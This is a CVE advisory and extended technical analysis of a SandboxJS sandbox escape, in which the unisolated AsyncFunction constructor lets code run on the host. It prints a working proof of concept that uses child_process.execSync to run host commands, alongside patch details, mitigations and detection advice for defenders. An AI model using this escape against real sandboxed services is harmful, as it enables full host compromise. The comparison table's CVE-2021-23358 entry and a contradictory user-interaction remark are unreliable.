CVE-2026-23830
CVE-2026-23830
Weakness (CWE)
CVSS Vector
v3.1- Attack Vector
- Network
- Attack Complexity
- Low
- Privileges Required
- None
- User Interaction
- None
- Scope
- Changed
- Confidentiality
- High
- Integrity
- High
- Availability
- High
Description
SandboxJS is a JavaScript sandboxing library. Versions prior to 0.8.26 have a sandbox escape vulnerability due to `AsyncFunction` not being isolated in `SandboxFunction`. The library attempts to sandbox code execution by replacing the global `Function` constructor with a safe, sandboxed version (`SandboxFunction`). This is handled in `utils.ts` by mapping `Function` to `sandboxFunction` within a map used for lookups. However, before version 0.8.26, the library did not include mappings for `AsyncFunction`, `GeneratorFunction`, and `AsyncGeneratorFunction`. These constructors are not global properties but can be accessed via the `.constructor` property of an instance (e.g., `(async () => {}).constructor`). In `executor.ts`, property access is handled. When code running inside the sandbox accesses `.constructor` on an async function (which the sandbox allows creating), the `executor` retrieves the property value. Since `AsyncFunction` was not in the safe-replacement map, the `executor` returns the actual native host `AsyncFunction` constructor. Constructors for functions in JavaScript (like `Function`, `AsyncFunction`) create functions that execute in the global scope. By obtaining the host `AsyncFunction` constructor, an attacker can create a new async function that executes entirely outside the sandbox context, bypassing all restrictions and gaining full access to the host environment (Remote Code Execution). Version 0.8.26 patches this vulnerability.
Comprehensive Technical Analysis of CVE-2026-23830 (SandboxJS Sandbox Escape Vulnerability)
1. Vulnerability Assessment and Severity Evaluation
CVE ID: CVE-2026-23830
CVSS Score: 10.0 (Critical) – AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
Vulnerability Type: Sandbox Escape (Remote Code Execution - RCE)
Root Cause: Incomplete isolation of JavaScript function constructors (AsyncFunction, GeneratorFunction, AsyncGeneratorFunction) in the SandboxJS library.
Severity Justification
- Attack Vector (AV:N): Exploitable remotely via crafted JavaScript payloads.
- Attack Complexity (AC:L): Low; exploitation requires minimal user interaction (e.g., executing untrusted code in a sandboxed environment).
- Privileges Required (PR:N): None; unauthenticated attackers can exploit this.
- User Interaction (UI:N): None; exploitation can occur without user action.
- Scope (S:C): Changed; the vulnerability allows escape from the sandbox, affecting the host system.
- Confidentiality (C:H), Integrity (I:H), Availability (A:H): Full compromise of the host environment is possible.
The CVSS 10.0 rating is justified due to the complete sandbox escape, enabling unrestricted RCE in the host environment.
2. Potential Attack Vectors and Exploitation Methods
Exploitation Mechanism
The vulnerability arises from incomplete sandboxing of JavaScript function constructors. SandboxJS replaces the global Function constructor with a safe alternative (SandboxFunction), but fails to do the same for:
AsyncFunctionGeneratorFunctionAsyncGeneratorFunction
An attacker can exploit this by:
- Creating an async function inside the sandbox:
const maliciousAsyncFn = async () => {}; - Accessing its constructor:
const AsyncFunction = maliciousAsyncFn.constructor; - Using the native
AsyncFunctionto execute arbitrary code outside the sandbox:const escapeFn = new AsyncFunction("return process.mainModule.require('child_process').execSync('whoami').toString()"); escapeFn(); // Executes in the host environment
Attack Vectors
- Web Applications Using SandboxJS:
- If an application allows user-supplied JavaScript to execute in a SandboxJS environment (e.g., plugin systems, scriptable workflows), an attacker can escape the sandbox and execute arbitrary commands.
- Server-Side JavaScript (Node.js):
- If SandboxJS is used to isolate untrusted code in a Node.js environment, exploitation leads to full server compromise.
- Browser-Based Sandboxing:
- If SandboxJS is used in a browser context (e.g., for isolating third-party scripts), exploitation could lead to DOM-based attacks, cookie theft, or XSS escalation.
Proof-of-Concept (PoC) Exploit
// Inside the SandboxJS environment
(async () => {
const AsyncFunction = (async () => {}).constructor;
const escape = new AsyncFunction(`
return process.mainModule.require('child_process').execSync('id').toString();
`);
console.log(escape()); // Outputs host system user ID
})();
This PoC demonstrates RCE by spawning a shell command (id) on the host system.
3. Affected Systems and Software Versions
Vulnerable Versions
- SandboxJS versions < 0.8.26
Affected Environments
- Node.js applications using SandboxJS for code isolation.
- Browser-based applications that rely on SandboxJS for sandboxing untrusted scripts.
- Any system where SandboxJS is used to execute untrusted JavaScript (e.g., plugin systems, scriptable APIs).
Unaffected Versions
- SandboxJS 0.8.26 and later (patched).
4. Recommended Mitigation Strategies
Immediate Actions
-
Upgrade to SandboxJS 0.8.26 or later (recommended fix).
- The patch adds mappings for
AsyncFunction,GeneratorFunction, andAsyncGeneratorFunctioninutils.ts. - Commit Reference: 345aee6566e47979dee5c337b925b141e7f78ccd
- The patch adds mappings for
-
Apply Workarounds (if upgrade is not possible):
- Disable async/generator functions in the sandboxed environment (if feasible).
- Use alternative sandboxing mechanisms (e.g., VM2, isolated-vm, or Deno’s permissions model).
- Implement strict input validation to prevent untrusted code execution.
Long-Term Mitigations
- Adopt Zero-Trust Sandboxing:
- Use WebAssembly (WASM) for untrusted code execution where possible.
- Implement process isolation (e.g., separate Node.js worker threads with restricted permissions).
- Enhance Monitoring:
- Log and alert on suspicious function constructor access in sandboxed environments.
- Security Testing:
- Fuzz testing to identify similar sandbox escape vectors.
- Static and dynamic analysis of sandboxed code execution.
5. Impact on the Cybersecurity Landscape
Broader Implications
- Increased Risk of Supply Chain Attacks:
- If SandboxJS is used in CI/CD pipelines, plugin systems, or serverless functions, exploitation could lead to widespread compromise.
- Erosion of Trust in JavaScript Sandboxing:
- This vulnerability highlights fundamental flaws in JavaScript sandboxing (similar to past issues in VM2, SES, and other libraries).
- Exploitation in Malicious NPM Packages:
- Attackers may embed sandbox escape payloads in malicious NPM packages, leading to supply chain attacks.
Comparison to Similar Vulnerabilities
| Vulnerability | Library | Root Cause | Impact |
|---|---|---|---|
| CVE-2022-36067 | VM2 | Incomplete Proxy handling | Sandbox escape → RCE |
| CVE-2021-23358 | Node.js vm module | Context isolation bypass | Sandbox escape → RCE |
| CVE-2026-23830 | SandboxJS | Missing AsyncFunction isolation | Sandbox escape → RCE |
This vulnerability reinforces the need for rigorous sandboxing mechanisms beyond simple constructor replacement.
6. Technical Details for Security Professionals
Root Cause Analysis
-
SandboxJS’s Isolation Mechanism:
- The library replaces the global
Functionconstructor withSandboxFunctionto prevent direct access to the host environment. - However,
AsyncFunction,GeneratorFunction, andAsyncGeneratorFunctionwere not included in the safe-replacement map (utils.ts).
- The library replaces the global
-
Exploitation Flow:
- Sandboxed code creates an async function:
const asyncFn = async () => {}; - Accesses its constructor:
const AsyncFunction = asyncFn.constructor; executor.tsfails to intercept the property access becauseAsyncFunctionis not in the safe-replacement map.- Returns the native
AsyncFunction, allowing unrestricted function creation in the host scope.
- Sandboxed code creates an async function:
Patch Analysis
- Fix in
utils.ts(SandboxJS 0.8.26):// Added mappings for missing constructors const constructorMap = new Map<Function, Function>([ [Function, sandboxFunction], [AsyncFunction, sandboxFunction], // ← New [GeneratorFunction, sandboxFunction], // ← New [AsyncGeneratorFunction, sandboxFunction] // ← New ]); - Impact of the Fix:
- Now, any attempt to access
AsyncFunctionvia.constructorreturns the sandboxed version, preventing escape.
- Now, any attempt to access
Detection and Forensics
-
Indicators of Compromise (IoCs):
- Unexpected
AsyncFunctionorGeneratorFunctionusage in sandboxed code. - Child process spawning from a sandboxed environment.
- Network connections originating from sandboxed code.
- Unexpected
-
Forensic Artifacts:
- Node.js process logs (e.g.,
child_process.execSynccalls). - Heap snapshots showing unexpected function constructors.
- Network traffic from sandboxed code (if RCE was used for data exfiltration).
- Node.js process logs (e.g.,
Exploitation Difficulty
- Low to Medium:
- Requires basic JavaScript knowledge (accessing
.constructor). - No memory corruption or complex ROP chains needed (pure logic flaw).
- Public PoCs likely to emerge quickly due to simplicity.
- Requires basic JavaScript knowledge (accessing
Conclusion
CVE-2026-23830 is a critical sandbox escape vulnerability in SandboxJS, allowing unrestricted RCE in the host environment. The flaw stems from incomplete isolation of JavaScript function constructors, enabling attackers to bypass sandbox restrictions via AsyncFunction.
Key Takeaways for Security Teams:
✅ Immediate patching (upgrade to SandboxJS 0.8.26).
✅ Audit sandboxed environments for similar misconfigurations.
✅ Monitor for exploitation attempts (unexpected AsyncFunction usage).
✅ Consider alternative sandboxing mechanisms (e.g., WASM, isolated-vm).
This vulnerability underscores the importance of comprehensive sandboxing and the risks of incomplete security controls in JavaScript environments. Organizations using SandboxJS should treat this as a high-priority remediation task to prevent potential breaches.